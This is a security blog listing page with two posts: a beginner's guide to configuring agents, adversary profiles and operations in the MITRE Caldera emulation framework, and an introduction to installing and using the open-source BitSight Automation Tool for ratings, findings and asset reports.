Normal view

There are new articles available, click to refresh the page.
Before yesterdayNVISO Labs

A Beginner’s Guide to Adversary Emulation with Caldera

25 August 2023 at 07:00
caldera logo

Target Audience

The target audience for this blog post is individuals who have a basic understanding of cybersecurity concepts and terminology and looking to expand their knowledge on adversary emulation. This post delves into the details of adversary emulation with the Caldera framework exploring the benefits it offers. By catering to a beginner to intermediate audience, the blog post aims to strike a balance between providing fundamental information for newcomers and offering valuable insights and techniques that can benefit individuals who are already familiar with the basics of cybersecurity.

What is Adversary Emulation

Adversary emulation is a methodology used to simulate the Tactics, Techniques, and Procedures (TTPs) used by known Advanced Persistent Threats (APTs), with the goal of identifying vulnerabilities in an organization’s security defenses. By emulating real-world attacks and incident response techniques, such as exploitation of vulnerabilities and lateral movement within a network, cybersecurity teams can gain a better understanding of their security posture and identify areas for improvement.

The Need for Adversary Emulation

Adversary emulation can help organizations test their security defenses against real-world threats. Some of the benefits the emulation offers are:

  • Identifying vulnerabilities: Adversary emulation assists organizations in identifying vulnerabilities, weaknesses or misconfigurations in their security defenses that might not have been detected through conventional security testing. This information can enhance the existing detection mechanisms by creating new alerts and rules that are triggered when similar activities are detected. The emulation results can also work as a guide in prioritizing mitigation and patching activities.
  • Improving security controls: By identifying weaknesses in their security defenses, organizations can make informed decisions about how to improve their security controls. This can include implementing new security technologies, updating security policies, or providing additional security awareness training to employees.
  • Measuring security effectiveness: Adversary emulation enables organizations to assess the effectiveness of their security defenses within a controlled environment. Through analyzing the emulation results, organizations can have a clearer understanding of how well their incidence response plan operates in real-world scenarios.If any gaps or inefficiencies are identified, the plan can be refined based on the new data.
  • Staying ahead of emerging threats: Adversary emulation exercises can help organizations stay ahead of emerging threats by testing their security defenses against new and evolving attack techniques. This can help organizations prepare for future threats and ensure that their security defenses are effective in protecting against them.

Emulation VS Simulation

Emulation involves creating a replica of a specific system or environment, such as an operating system, network, or application. It provides a more realistic testing environment, which can help identify vulnerabilities and test the effectiveness of security controls in a more accurate and reliable way. However, creating an emulation environment can be time-consuming and resource-intensive, and it may not always be feasible to replicate every aspect of a real-world environment.

Simulation, on the other hand, involves creating a hypothetical scenario that models a real-world attack. It is often quicker and easier to set up, and can be used to test response plans and procedures without the need for a complex emulation environment. However, simulations may not always provide a completely accurate representation of a real-world attack scenario, and the results may be less reliable than those obtained through emulation.

The Caldera Framework

MITRE’s Caldera project is an open-source platform that allows organizations to automatically emulate the tactics, techniques, and procedures (TTPs) used by real-world APTs. The platform is designed to be modular, which means that it can be customized to fit the specific needs of an organization. More information can be found in the official documentation and on GitHub. Red team operators can benefit from this by manually executing TTPs and blue team operators can run automated incident response actions. Caldera is also highly extensible, meaning that it can be integrated with other security tools to provide a comprehensive view of an organization’s security defenses. Moreover, it is built on the MITRE ATT&CK framework which is where the platform draws all the Tactics, Techniques and Procedures (TTPs) from.

Most common use cases of this framework include but not limited to:

  • Autonomous Red Team Engagements: This case is used to emulate the TTPs of known adversary profiles to discover gaps across an infrastructure, test the defenses currently in place and train operators on detection different threats.
  • Manual Red Team Engagements: This case allows red team operators to replace or extend the attack capabilities of a scenario, giving them more freedom and control over the current emulation.
  • Autonomous Incident Response: This case is used by blue team operators to perform automated incident response actions to aid them in identifying TTPs and threats that other security solutions may not detect and/or prevent.

Caldera consists of two main components:

  • The core system, which is the framework’s code, including an asynchronous command-and-control (C2) server with a REST API and a web interface.
  • Plugins which are separate repositories that expand the core framework capabilities and provide additional functionality. Examples include agents, GUI interfaces, collections of TTPs and more.

In Figure 1 below, we are greeted with when we login either as user red or blue and some basic terminology.

Caldera's Main Menu
Figure 1: Caldera’s Main Menu
  1. Agents: An agent is another name for Remote Access Trojan (RAT). These programs written in any language, execute an adversary’s instructions on compromised systems (victims). Often, an agent will communicate back to the adversary’s server through an internet protocol, such as HTTP, UDP or DNS. Agents also beacon into the C2 on a regular basis, asking the adversary if there are new instructions. If a beacon misses a regularly scheduled interval, there is a chance the agent itself has been discovered and compromised.
  2. Abilities: An ability is a specific set of instructions to be run on a compromised host by an agent immediately after sending the first beacon in.
  3. Adversaries: Adversary profiles are groups of abilities, representing the tactics, techniques, and procedures (TTPs) of known real-world APT groups. Adversary profiles are used when running an operation to determine which abilities will be executed.
  4. Operations: An operation is an attack scenario which uses the TTPs of pre-configured adversary profiles. An operation can be run automatically where the agents and the C2 server run without the operator’s interference and can only run tasks in the adversary profile. On the other hand, there is the manual mode where the operator approves every command before it is tasked to an agent and executed. Additionally in manual mode the operator can add extra TTPs. In order to run an operation at least one agent must be active.
  5. Plugins: They provide additional functionality over the usage of the framework.

Configuring an Agent

When we select “agents” from the figure 1 menu above, we are greeted with the figure 2 page.

Figure 2: Agent's Menu
Figure 2: Agent’s Menu

If we select the “Configuration” button, a new window opens where we can configure different options for all the agents created afterwards.

Agent's Configuration Menu
Figure 3: Agent’s Configuration Menu
  • Beacon Timer(s) = This fields sets the minimum and maximum amount of seconds the agent will take to beacon back home.
  • Watchdog Timer(s) = This field sets the number of seconds an agent has to wait, if the server is unreachable, before it is killed.
  • Untrusted Timer(s) = This field sets the number of seconds the server has to wait before marking a missing or unresponsive agent as untrusted. Furthermore, operations will not generate new links or send new instructions to untrusted agents.
  • Implant Name = This field sets the name for the newly created agents.
  • Bootstrap Abilities = This is a list of abilities to be run when a new agent beacons back to the server. By default, it runs a command which clears the command history.
  • Deadman Abilities = This is a list of abilities to be run immediately before an agent is killed.

To deploy an agent, we can press the “Deploy an Agent” button and we are greeted with this page. For this example, the agent Sandcat will be used.

By deploying the agent we refer to the process of installing and setting up the agent on the target system to enable it to perform specific actions or functions such as: monitoring, management, data collection, exploitation, reconnaissance and many more.

In figure 4, we can select the agent we want to deploy.

Agent Selection
Figure 4: Agent Selection

Next, in figure 5, we have to select the operating systems the agent will be deployed on.

Agent Platform Selection
Figure 5: Agent Platform Selection

In this example, the Linux operating system has been chosen and Caldera provides us with some options and some pre-built commands. These commands can be copied and run directly to the victim’s terminal for the agent to be deployed. There are different variations for the deployment of the selected agent such as:

  • It can be deployed as a red or blue agent.
  • It can be downloaded with a random name and start as a background process.
  • It can be deployed as a peer-to-peer (P2P) agent with known peers included in the compiled agent.

Moreover, the settings that can be modified are:

  • app.contact.http = This field is where the URL of the server’s address can be specified.
  • agents.implant_name = This field represents the name of the agent binary.
  • agent.extensions = This field takes a list of agent extensions to compile with the binary.
Agent's Deployment Options
Figure 6: Agent’s Deployment Options

After an agent has been deployed it will be shown in the agent’s window, as illustrated in Figure 7.

Active Agents
Figure 7: Active Agents

If an agent is selected, a new window opens that shows some settings that can be modified along with some information about the system the agent is installed on and a kill switch, as shown in figure 8.

Agent's Options After Deployment
Figure 8: Agent’s Options After Deployment
  • Contact = This field specifies the protocol in which the agent will communicate with the server.
  • Sleeper Timer = This is the same as the Beacon Timer(s).

Configuring an Adversary Profile

Caldera comes with pre-defined profiles to choose from, loaded with known TTPs. There is also the option to create a new profile with mixed TTPs, providing an operator more flexibility over the operation. An adversary profile can be created and configured in the “adversaries” window as shown below in figure 9.

Creating A New Adversary Profile
Figure 9: Creating A New Adversary Profile

After the “New profile” button is pressed, a name and a description for the new adversary profile will be asked.

A new ability can be added to the newly created profile by pressing the “add Ability” button.

Adding an Ability To an Adversary Profile
Figure 10: Adding an Ability To an Adversary Profile

Then a new window will open where the specific ability can be chosen and configured, as depicted in figure 11.

Configuring an Ability
Figure 11: Configuring an Ability

Here an already existing ability can be added by searching for it in the search bar or a new one can be configured by choosing a specific Tactic, Technique and Ability as shown above, along with all the details shown in the “Ability Details” section.

This newly created ability can be added to the TTPs of an already existing adversary profile by pressing the “Add Adversary” button. A new window will open to choose the appropriate profile.

Choosing an Adversary Profile
Figure 12: Choosing an Adversary Profile

Finally, by pressing the “Save Profile” button the new profile is created and can be added to an operation.

Save The New Profile
Figure 13: Save The New Profile

Configuring an Operation

An operation can be created and configured in the “operations” window.

Creating A New Operation
Figure 14: Creating A New Operation

After that a new window will open with all the modifiable settings.

Operation's Configuration
Figure 15: Operation’s Configuration
  • Operation Name = Specifies the name of the operation.
  • Adversary = Specifies a specific adversary profile to emulate along with the pre-configured TTPs associated with this profile.
  • Fact Source = In this field a fact source can be attached to the current operation. This means that the operations will start with some knowledge of the facts which can be used to fill in different variable inside some abilities. A fact is identifiable information about the target machine that can be used by some abilities, such as usernames, passwords, hostname etc.
  • Group = Specifies the collection of agents to run against
  • Planner = Specifies which logic library to use for the current operation. A planner is a Python module which contains logic that allows a running operation to make decisions about which abilities to use and in what order. The default planner is the “Atomic” which sends a single ability command to each agent in a group at a time. The order in which the commands are sent is the same as in the adversary’s profile.
  • Obfuscators = This field specifies which obfuscator to use to encode each command before they are sent to the agents. The available options are:
    • Base64 = Encodes the commands in base64
    • Base64jumble = Encodes the commands in base64 and then adds characters
    • Base64noPadding = Encodes the commands in base64 and then removes padding
    • Caesar cipher = Obfuscates the commands with the Caesar cipher algorithm
    • Plain text = No obfuscation
    • Steganography = Obfuscates the commands with image-based steganography
  • Autonomous = Specifies if the operations will run autonomously or manually. In manual mode the operator will have to approve each command.
  • Parser = Parsers are Python modules that are used to extract facts from command outputs. For instance, some reconnaissance commands can output file paths, usernames, passwords, shares etc. these facts can then be fed back into future abilities. Parsers can also be used to create facts with relationships between them, such as username and password facts.
  • Auto-close = This option automatically terminates the operation when there are no further actions left. Alternatively, it keeps the operation open until the operator terminates it manually.
  • Run state = This option pauses the operation on start or runs immediately
  • Jitter = Specifies the minimum and maximum number of seconds the agents will check in with the server while they are part of an active operations.
  • Visibility = This option specifies how visible should the operation be to the defense. Abilities with higher visibility than the operation’s will be skipped.

After the “start” button is pressed the operation will start and the results will be shown on the screen whether each task fails or succeeds. There is also the option to view each command and its result, as illustrated in figure 16.

Operation's results
Figure 16: Operation’s results

This was a red team operation, but in order to see the full picture some security solutions should also be running on the target systems to examine what was prevented and what went undetected.

Configure Automated Incident Response Plan

To form an incident response plan the “blue” user must be logged in.

The blue team’s main menu is a little different than the red team’s one. The main change is the “response plugin” which is a counterpart of the threat emulation plugins. At the time of writing this blog post, it contains 37 abilities and 4 defender profiles that focus on detection and response actions.

In the “Defenders” tab a new custom defender profile can be created and configured with the same way as the adversaries profile.

Incident Responder Section
Figure 17: Incident Responder Section

The profiles included in this plugin are:

  • Incident Responder
  • Elastic Hunter
  • Query Sysmon
  • Task Hunter

All available abilities for each defender profile can be viewed in the “abilities” section, after the specific profile has been chosen from the “response” tab, as shown in figure 17.

Defender Abilities
Figure 18: Defender Abilities

Defender abilities are classified by four different tactics:

  • Setup: These abilities prepare information to be used by other abilities
  • Detect: These abilities focus on finding suspicious behavior by continuously monitoring the ingested information and run as long as the operation is active.
  • Response: These abilities act autonomously once suspicious is detected. Such actions include, killing a process, modifying firewall rules, deleting of a file and so on.
  • Hunt: These abilities focus on searching for Indicators of Compromise (IOCs) via logs or file hashes.

Blue team operations are configured the same way as the red team operations. The main difference in the procedure is that the agent must be deployed as blue instead of red, in the “adversary” option a defender profile must be selected and in the Fact source section the “response” option must be selected.

Deploy Blue Agent
Figure 19: Deploy Blue Agent
Configuring A Blue Team Operation
Figure 20: Configuring A Blue Team Operation

The result structure is the same as the red team operation. The commands and their output are shown and whether they were successful or not.

Conclusion

In conclusion, leveraging the Caldera framework for adversary emulation presents a robust and proactive approach to enhancing cybersecurity defenses. Through the simulation of real-world attack scenarios, organizations can acquire invaluable insights into potential vulnerabilities and subsequently strengthen their incident response capabilities. The flexibility, modularity, and extensibility of Caldera establish it as an ideal tool for executing sophisticated emulation exercises.

By harnessing adversary emulation in conjunction with the Caldera framework, cybersecurity experts are equipped with the means to proactively safeguard their organizations against potential threats.

Profile photo

Konstantinos Pantazis

Konstantinos is a SOC analyst for NVISO security.
When he is not handling alerts, he is usually sharpening his skills for purple teaming.

Introducing BitSight Automation Tool

8 August 2023 at 07:00
BitSight Automation Featured Image
  1. Glossary
  2. Introduction
  3. BitSight
  4. Automation
    1. Operations
  5. Structure
  6. Installation
    1. Prerequisites
    2. Configuration
    3. Generating an API key for your BitSight account
    4. Adding the API Key to the BitSight Automation Tool
      1. Windows
      2. Linux
    5. The group_mapper.json file
    6. The guid_mapper.json file
    7. Configuring your Company’s structure
      1. The groups.conf file
      2. Letting BitSight Automation Tool handle the rest
    8. Binding into Executable
  7. Execution
    1. Usage
    2. Use Cases
      1. Functional Operation: Rating
      2. Functional Operation: Historical
      3. Functional Operations: Findings
      4. Functional Operation: Assets
      5. Functional Operation: Reverse Lookup
      6. Supplementary Operation: List
      7. Supplementary Operation: Update
    3. Task Scheduler / Cron Jobs
      1. Windows – Task Scheduler
      2. Linux – Cron Jobs
  8. Troubleshooting
    1. Total Risk Monitoring Subscription Required
    2. File not Found *.JSON
  9. Conclusion

Glossary

EntityA part of an organization that can be assessed as a single figure.
SubsidiarySame as an Entity on BitSight’s side.
Group ClusterA complex. It can contain entities/subsidiaries, or Groups, or more Group Clusters.
GroupA structure that can contain Entities.
Glossary

Introduction

In this blog post you will be introduced to the BitSight Automation Tool (https://github.com/NVISOsecurity/BitSight-Automation-Tool). BitSight Automation was developed to automate certain manual procedures and extract information such as ratings, assets, findings, etc. Automating most of these tasks is crucial for simplicity and time saving. Besides that, this tool also provides the possibility to collaborate with Scheduled Tasks and cronjobs. You can configure the tool to execute in certain intervals or dates, and retrieve the results from the desired folder without needing to interact with it.

BitSight

What is BitSight? BitSight is a solution that helps organizations perform three (3) main functions.

  1. Quantify their cyber risk
  2. Measure the impact of their security efforts
  3. Benchmark their performance against peers

It does all that by managing the company’s external facing infrastructure both automatically and manually, by allowing a company to provide updates to BitSight in order to keep their database up to date.

Other functions that are useful and provided by BitSight are:

  • Performing periodic vulnerability assessments on those assets to determine the risk factors and reports back the findings.
  • Identifies malicious activity such as botnet infections and much more that adds up to the risk factor.
  • Provides detailed remediation tips to remediate findings.

Automation

By utilizing parts of the BitSight API Python wrapper developed by InfosecSapper, we developed an open source tool for the community to use, that fully automates some of BitSight’s operations, which we have named BitSight Automation Tool. This tool has a lot of potential to expand further with even more operations based on the needs that might arise.

Operations

You might be wondering by this point, what operations can this tool automate? Currently we have 5 operations that can be automated + 2 supplementary to assist with the tool’s maintenance.

  1. Rating -> Retrieve the current score of an entity and confirm it’s above or equal to your company’s required security policies or digital mandate.
  2. Findings -> Generate a filtered list of vulnerabilities for an entity to remediate.
  3. Assets -> Retrieve the asset count and asset list of an entity, to validate your public IP space.
  4. Reverse Lookup -> Investigate where an IP, IP Range, domain or domain wildcard is attributed to and what IPs or domains it is associated with.
  5. Historical Ratings -> Sets up an overview of ratings for a given entity or group over a specified timeframe (maximum 1 year) to showcase in reports and review progress or regress.
  • List ->  Review the correlation between an entity’s custom given name and BitSight’s given name in a list for all defined entities.
  • Update -> Automatically update the tool and its respective JSON files.

Structure

The below image is a representation of the current state of the tool. At the time of writing the tool comes with the following structure.

  • BitSightAPI: This folder contains certain vital Python files from the BitSightAPI Python wrapper.
  • ArgumentsHandler.py: This file contains the instructions on how to parse the tool’s arguments.
  • README.md: This file is your friend. It contains all the information on how to execute with examples, as well as troubleshooting advice.
  • bitsight_automation.py: This file is the heart of the tool. You can execute this Python file and use it for your Scheduled tasks or cron jobs.
  • group_mapper.json: This file is a JSON structure which represents the mapping of the groups and entities within your organization. (More on this in a dedicated section)
  • guid_mapper.json: This file is a JSON structure which represents the mapping of the entities and their respective GUIDs assigned to them by BitSight. (A GUID is the unique handle used by BitSight to identify your subsidiary)
  • groups.conf: This file is the main configuration to define your groups. It defines the groups which the tool will interact with.
  • requirements.txt: This file indicates all the required libraries for the tool to operate.
Files Diagram
Figure 1: Files Diagram

Installation

Prerequisites

In order to use the tool, we first need to install it. Regardless of the Operating System you are using, you will need to have Python installed. The tool has been tested with Python 3.8 and 3.11 at the time of writing, so any Python 3.x.x version should work.

Note: When installing Python make sure to include it in your PATH and include the PIP package manager as well.

Next step would be to install the tool’s requirements. To do so, navigate to the tool’s directory within a command prompt / terminal or PowerShell window and execute the following command: `pip install -r requirements.txt`

All the prerequisites are installed at this point, but we still have a couple more steps to perform before we can use the tool.

Configuration

Now that you have installed the prerequisites, we are one step closer to utilizing the tool. Before we do so, we need to update a couple of files.

Generating an API key for your BitSight account

First you need to generate an API key from your account in BitSight. To do so,

  1. Login to your BitSight account
  2. On the top right corner of the UI, click on Settings.
  3. Select Account
  4. Scroll down until you see an “API Token” section
  5. Select “Generate API Token
  6. Copy the newly generated token.

Adding the API Key to the BitSight Automation Tool

In order for the BitSight Automation Tool to use this API key, you need to include it as an environmental variable in the system you will be running the tool on. We’ll do so below for both Windows and Linux.

Windows

For Windows systems,

  1. Open the search menu
  2. Search for “Edit the System Environment Variables
  3. Select that option
  4. Select “Environment Variables
  5. On the “User Variables” click “New
  6. In the “Variable Name” field, add the value “BITSIGHT_API_KEY
  7. In the “Variable Value” field, add the generated token you copied in the previous section.

Linux

For Linux systems,

  1. Open a terminal
  2. Replace the “{token}” section with your token, and execute the following command:
echo export BITSIGHT_API_KEY={token} >> ~/.bashrc

The group_mapper.json file

This file is the heart of the tool. It will be queried to retrieve entities for every operation.

An example of a group_mapper.json file can be found below.

{
    "Root":[
      {"Group1": "Single Entity"},
      {"Cluster Group2": ["EntityOne", "EntityTwo", "EntityThree"]},
      {"Bigger Cluster Group3": [
        {"SubCluster": ["Entity1", "Entity2"]},
        {"SubCluster2": ["EntityUno", "EntityDos"]}
      ]},
      "Random Entity that sits alone under the root"
    ]
}

The grouping subsidiaries can be organized like above. A few rules apply:

  • All of your subsidiaries must be under the “Root” subsidiary. The “Root” Subsidiary is your main subscription in BitSight that contains all the others (if any).
  • The Root subsidiary contains a list of other group subsidiaries or subsidiaries that are directly under the Root.
  • A Group or Group Cluster subsidiary can hold one, or more subsidiaries.
  • You can define bigger Cluster Group subsidiaries that contain even more group subsidiaries, which in turn can contain more subsidiaries.
  • You can create your own Group subsidiaries even if they don’t exist in BitSight for better structuring.
  • You can use your own naming conventions for all your subsidiaries and group subsidiaries without affecting BitSight or the retrieved information.

The guid_mapper.json file

This file is the tie between BitSight and the BitSight Automation Tool. This is where the magic happens where your naming conventions can relate back to specific subsidiaries within BitSight.

An example of a guid_mapper.json file can be found below.

{
    "Root": "463862495-ab29-32829-325829304823",
    "Group1": "463862495-ab29-32829-325829304824"
}

This structure is the most basic structure you can have. The only thing you have to do is to create a new line for each subsidiary and assign its GUID from BitSight.

Below you may find how to get the GUIDs for the subsidiaries. A few rules that apply:

  • The order doesn’t matter.
  • Make sure you use the exact naming convention you used on the group_mapper.json file. (It’s case sensitive)
  • Do not add any lists or other structures in this file. It should be one line for every subsidiary.
  • For groups you added in group_mapper.json file, that do not exist in BitSight, add a line like the following: “{your-group}”:”-“,

Configuring your Company’s structure

This step is mandatory for the tool to operate correctly. You can either use BitSight’s structure or you can create your own that suits best for your company.

Update Example
Figure 2: Update Example

The groups.conf file

Once you have completed the above steps, you need to modify one last item in the configuration of the tool.

The ‘groups.conf’ file structure should look like below (Figure 3)

Groups Modification
Figure 3: Groups Modification

You can add your groups one per line.

Note: Do not modify the first line. It should remain as is [Groups].

Letting BitSight Automation Tool handle the rest

You have completed the manual part of the configuration! Pretty simple, right?

Execute the tool with the update operation.

python bitsight_automation.py update

This will go through Bitsight and find any subsidiaries that are missing. It will then prompt you to include it into the configuration. Follow the steps, provide the required information and the tool will take care of the rest.

Example:

PS C:\Users\Konstantinos Pap\Desktop\BitSight Automation> python .\bitsight_automation.py update

Subsidiary Name – GUID not found in our configuration

Would you like to include it (Y/N)? y
What is the name of this entity? Test
Under which group should this entity fall under({your-groups}) ? myTestGroup
Adding Subsidiary Name with guid {GUID} as Test in myTestGroup

Configuration Updated

Binding into Executable

Before we dive into how to utilize this tool, let’s first dive into how we can make an executable bundle for this tool. Performing this step allows for easier sharing and makes the tool usable by anyone, from analyst to CISO, without any specific requirements. We can use Pyinstaller to create the .exe standalone file.

  1. First, open a terminal
  2. Now, we need to install pyinstaller. Use the `pip install pyinstaller` command to download and install pyinstaller.
  3. Afterwards, navigate into the tool’s directory from within the terminal window.
  4. Execute the following command: “pyinstaller bitsight_automation.py -p __pycache__ -F

Wait for a few seconds and notice there is a new directory created named “dist”. Grab the 2 .json files and the README.md file and copy them into the dist directory. Zip the contents of that directory and distribute that bundle on any Windows system. It will execute without any need for dependencies.

Note: You still have to export the environment variables to the new machines in order for the tool to be able to connect to BitSight.

Execution

Now that we installed and fully configured BitSight, we can go ahead and use its capabilities. As we already mentioned before, the tool allows for 5 different operations + 2 supplementary to assist with the tool’s maintenance.

We’ll first have a look at the usage menu of the tool and then we’ll navigate over a breakdown of each operation and how it works with examples.

Usage

Invoke the tool with its –help attribute.

PS ~/> python .\bitsight_automation.py --help

usage: bitsight_automation.py [-h] [-g {{your-groups}}] [-e ENTITY] [-v]
                              [-s {All,Critical-High,Critical,High,Low,Medium}]
                              [-so {alphanumerically,alphabetically}] [--search SEARCH] [--months MONTHS]
                              {rating,historical,findings,assets,reverse_lookup,list,update}

BitSight Automation tool to automate certain operations like historical report generation, findings categorization, asset list retrieval, reverse lookup of IP addresses and current ratings for entites

positional arguments:
  {rating,historical,findings,assets,reverse_lookup,list,update}
                        The operation to perform.

optional arguments:
  -h, --help            show this help message and exit
  -g {{your-groups}}, --group {{your-groups}} The group of entities you want to query data for.
  -e ENTITY, --entity ENTITY A specific entity you want to query data for
  -v, --verbose         Increase output verbosity
  -s {All,Critical-High,Critical,High,Low,Medium}, --severity {All,Critical-High,Critical,High,Low,Medium}
                        Level of Severity to be captured
  -so {alphanumerically,alphabetically}, --sort {alphanumerically,alphabetically}
                        Sort rating results either alphanumerically or alphabetically.
  --search SEARCH       IP or Domain to reverse lookup for.
  --months MONTHS       Add in how many months back you want to view data for. If you want 1 year, fill in 12 months.
                        Max is 12

For any questions or feedback feel free to reach out to [email protected]

Use Cases

Now we will go through a breakdown of all different use cases within BitSight Automation Tool. We’ll go through the functional first and we’ll leave the last 2 complementary at the end.

For every operation different arguments will be required or not needed. The tool will let you know if you missed something during runtime. Example output:

[-] You need to specify one of the arguments --country or --region.

Functional Operation: Rating

Use the rating operation to retrieve the current score of an entity or group in order to confirm if it’s above or equal to your policies. If a group is supplied this operation will output all of the subsidiaries under the specified group in the order you specified them in the JSON files (You also have the option to sort them alphanumerically)

Let’s try to fetch the current rating for our “Test” subsidiary.

PS ~/> python .\bitsight_automation.py rating -e Test

Test - 790
[+] Data saved to: 2023-03-17_bitsight_rating_Test.txt

Our Test Subsidiary has a score of 790. That’s an advanced score, so we can cross-verify with the company’s policies and take further action if needed. The results are also saved as a TXT file to allow easy copy/paste if required.

We can do the same thing for our Group and retrieve all the scores from all subsidiaries under our “Test Group”.

PS ~/> python .\bitsight_automation.py rating -g “Test Group”

[*] This may take a moment. Grab a coffee
Working on Test Group...
Test Group – 660
EntityOne - 620
Test Entity 2 - 760
EntityTwo - 770
[+] Data saved to: 2023-03-17_bitsight_rating_Test Group.txt

Notice we have retrieved ratings for all subsidiaries under “Test Group” in addition with the rating of “Test Group”. Some additional notes:

  • If “Test Group” didn’t have a GUID then it will not pull any data for it.
  • You can change the sorting algorithm using the -so argument.
  • You can retrieve the rating of “Test Group” without having to go through its subsidiaries. To do so, you can treat it like a normal entity, supplying it with the -e argument instead.
  • If your group is a big cluster group containing more groups that contain more subsidiaries, the tool will recursively query Bitsight for all those groups and subsidiaries under the cluster group and its respective groups and subsidiaries. (In order words, nothing will be skipped)
  • You can use -g {Root} to retrieve ratings for all the subsidiaries in your company. (Replace {Root} with the name you have given it)

Functional Operation: Historical

Use the historical operation to set up an overview of ratings for a given subsidiary or group over a specified timeframe (maximum 12 months) to showcase in reports and review progress or regress. Typically this operation is used with the -g argument but you can also utilize the -e argument for a given subsidiary only.

Let’s try to generate a report for our previous “Test Group” and its subsidiaries for the past year.

PS ~/> python .\bitsight_automation.py historical -g “Test Group” --months 12

Grab a coffee, this will take a while...
Working on Test Group...
[+] Data saved to 2023-03-17_Test Group_bitsight_historical_ratings_12_months.xlsx

Note: This command might take some time depending on the size of your organization + the number of subsidiaries it has to query data for. In any case, it is verbose enough to let you know in which group it is working on each time, so if you supplied a big cluster group you would have real time output of the progress.

The report:

Historical Report
Figure 4: Historical Report

There is a legend in the second sheet (tab) of the Excel file that denotes what these colors are and their scores – aligned with BitSight’s ratings and color coding.

Historical Score Indication
Figure 5: Historical Score Indication

Note: You can generate these types of reports with no limitation to a number of subsidiaries. You can even generate it for the entire organization using the Root subsidiary.

Functional Operations: Findings

Use the findings operation to generate a filtered list of vulnerabilities for a subsidiary to remediate. This operation works solely with subsidiaries and not groups! You also need to supply the severity level with the -s argument.

Note: Your subsidiaries need to have a ‘Total Risk Monitoring’ subscription for this command to work. Otherwise it will produce an error.

Let’s retrieve the findings for our ‘EntityOne’ subsidiary under ‘Test Group’ we used earlier. We will retrieve the Critical vulnerabilities only.

PS ~/> Python .\bitsight_automation.py findings -e EntityOne -s Critical

[+] Data saved to bitsight_Critical_findings_EntityOne_2023-03-17.csv

Critical findings were downloaded and saved to a file called ‘bitsight_Critical_findings_EntityOne_2023-03-17.csv’. You can now start working on remediating the findings or assign it to the proper internal team.

Functional Operation: Assets

Use the assets operation to retrieve the asset count and asset list of a subsidiary in order to validate your public IP space. This operation works solely with subsidiaries and not groups. This is a two-step process of querying. The operation first queries BitSight to retrieve the total count of public IPs in your subsidiary and then queries for the detailed asset list.

Note: This command requires a ‘Total Risk Monitoring’ subscription. If one is not available this command will produce an error.

Let’s attempt to retrieve the asset list for our ‘EntityOne’ subsidiary from the previous examples.

PS ~/ > python .\bitsight_automation.py assets -e EntityOne

EntityOne - 1410
*********** Asset List ************
[+] Asset List saved to: bitsight_asset_list_EntityOne_2023-03-17.csv

Note: This command will only fetch assets that are correctly attributed to this subsidiary. There’s a difference between correctly attributed by BitSight and internal/private Tagging.

Functional Operation: Reverse Lookup

Use this command to investigate where an IP, IP Range, domain or domain wildcard is attributed to and what IPs or domains it is associated with. This command only requires the –search argument.

Let’s attempt to find out where our test.com domain is attributed to and what public IPs it is associated with.

PS ~/> python .\bitsight_automation.py reverse_lookup --search test.com

test.com - ['<Redacted XX.XXX.XX.XXX>']: Found in: EntityOne

Supplementary Operation: List

Use this operation to review the correlation between an entity’s custom given name and BitSight’s given name in a list for all defined entities. This command does not require any arguments.

Let’s view our subsidiaries and their correlation to BitSight.

PS ~/> Python .\bitsight_automation.py list

Listing Configuration...
Root – My Test BitSight Organization
Group One – First Group Subsidiary
EntityOne- Entity1 Test
Test Entity 2- Entity 2 Test
EntityTwo – SSEntity 2

Note: The mapping is {my JSON representation – BitSight’s representation}. The two names are bound over the GUID unique value for a subsidiary.

Supplementary Operation: Update

Use this operation to automatically update the tool and its respective JSON files. We already saw how this command works in the configuration section.

Task Scheduler / Cron Jobs

As we already mentioned, we can either manually execute the BitSight Automation Tool or we can set it up to automatically execute on its own recurringly over a specified window of time. This is relatively easy to achieve in both Linux and Windows operating systems.

Windows – Task Scheduler

To achieve this in Windows we need to utilize the Task Scheduler utility provided by Microsoft itself. No need to download or install any additional software. Let’s configure it.

  1. Open the Task Scheduler.
  2. On the top left, select “Task Scheduler Library“. (Figure 6)
Task Scheduler Library
Figure 6: Task Scheduler Library
  1. On the top right, select “Create Basic Task
Create Basic Task
Figure 7: Create Basic Task
  1. Write down a name and description like below:
Creating Basic Task
Figure 8: Creating Basic Task
  1. Then click “Next
  2. Select a Monthly Trigger and click Next
Selecting Interval
Figure 9: Selecting Interval
  1. Next, select the dates you wish to execute. I will select all months, and run on every 1st Monday of the Month and click Next.
Selecting TimeFrame
Figure 10: Selecting Timeframe
  1. Choose “Start a Program” and click Next.
Selecting Action
Figure 11: Selecting Action
  1. Browse to your bitsight_automation.exe file you created earlier for the “Program/Tool”field. For the arguments field supply “historical -g {your-group} –months XX” and replace {your-group} with the group you wish to execute for, and how many months back you want. (Remember it’s up to 12 months maximum). For the “Start in (Optional)” field add in the path to the executable. This is required here because the BitSight Automation Tool expects the JSON files in the same directory it is executing from. Finally click Next.
Configuring the Program and Arguments
Figure 12: Configuring the Program and Arguments.
  1. Verify all is correct and click on Finish.

Your Scheduled task is ready. You can manually invoke it once to verify it’s working correctly from the right bar, selecting ‘Run

Running the task
Figure 12: Run

Note: You can follow this procedure for other tasks as well. (Update excluded as it requires manual intervention. However, the shell or prompt that will open will be interactive, so you can issue update comments on a daily basis anyway and if there are any, you can interact with the tool.)

Linux – Cron Jobs

The same process can be setup for Linux as well using the Cron Jobs it offers.

Write the following new line into the “/etc/crontab” file and replace ‘{your-tool-directory}’ with your tool’s directory (i.e. /opt/bitsight):

10 9 1 * * kali cd {your-tool-directory} && Python bitsight_automation.py historical -g Root –months 12

This will execute the tool every first of the month at 9:10 in the morning.

Troubleshooting

While executing this tool you might run into some issues here and there. This section will go over the 2 most common notifications you might encounter while using BitSight Automation.

Total Risk Monitoring Subscription Required

You may have noticed in the Execution section of a couple of operations a note saying “This operation requires a ‘Total Risk Monitoring’ subscription to work. Otherwise it will produce an error”. These types of errors are usually encountered in Findings and Assets operations. The output will look something like this.

If we remove the ‘Total Risk Monitoring’ subscription from EntityOne and execute the findings operation on it again, we will run into the following error:

PS ~/> Python .\bitsight_automation.py findings -c EntityOne -s Critical

It appears as there are no findings in EntityOne or there is something wrong with the API. Please validate the old fashioned way using your browser.
More Details: list index out of range
It might be the case you do not have a 'Total Risk Monitoring' subscription. The 'Risk Monitoring' subscription is unable to work with the API for this operation

Response: {'links': {'next': None, 'previous': None}, 'count': 0, 'results': []}

File not Found *.JSON

In case you execute the tool and it reports back with “File not found” it means that somehow the necessary files were deleted. In order to resolve this issue you need to create the files again with the text “{}”inside them.

PS ~/> Python .\bitsight_automation.py findings -c EntityOne -s Critical

